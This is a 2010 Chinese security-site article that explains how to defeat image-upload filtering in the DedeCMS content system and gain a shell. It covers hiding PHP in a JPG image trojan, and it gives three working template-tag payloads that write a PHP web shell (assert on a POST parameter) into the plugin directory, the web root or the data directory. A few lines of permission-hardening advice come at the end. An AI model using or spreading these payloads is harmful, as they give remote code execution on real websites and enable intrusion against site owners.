热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

突破最新版dede图片上传过滤拿shell技巧

发布时间:2010-11-25 12:40文章来源:网络文章作者:udb311 点击次数:
摘要:1、图片过滤// 加强上传过滤 官方最新补丁: http://bbs.dedecms.com/232740.html 突破方法:使用edjpgcom把正常图片合成执行代码,添加到图片中。 已合成图片木马:生成在网站根目录文件名inc.php 密码xss 图片另存为,使用C32打开效果如下: 2、目录无法写...

1、图片过滤//加强上传过滤
官方最新补丁:http://bbs.dedecms.com/232740.html

突破方法:使用edjpgcom把正常图片合成执行代码,添加到图片中。

已合成图片木马:生成在网站根目录文件名inc.php 密码xss

 
以上图片另存为,使用C32打开效果如下:

 

2、目录无法写入:当碰到目录无法写入或者无脚本执行权限时可以试试!

利用plus/views.php页面执行时,默认生成目录是plus下。

如执行代码1:生成当前目录inc.php

gif89a{dede:name runphp='yes'}
$fp = @fopen("inc.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'assert($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}

 

切换目录:

执行代码2:生成上级目录(即网站根目录)

gif89a{dede:name runphp='yes'}
$fp = @fopen("./../inc.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'assert($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}

 

执行代码3:生成date(date、uploads必须可写入目录)

gif89a{dede:name runphp='yes'}
$fp = @fopen("./../date/inc.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'assert($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}

 

DEDE安全加固设置:

1、wwwroot给予IIS读取权限;

2、网站根目录index.html文件给予读取、写入权限

3、date、uploads给予读取、写入权限,并除去脚本执行权限。

4、对生成html目录给予读取、写入权限,并除去脚本执行权限。

以上设置可以增加安全性,对程序使用没有任何影响。

 

by:黑白前线  过客

2010-11-25

 

 

 

标签分类: 脚本渗透

上一篇:URL静态化背后的安全隐患
下一篇:linux入侵渗透打包数据库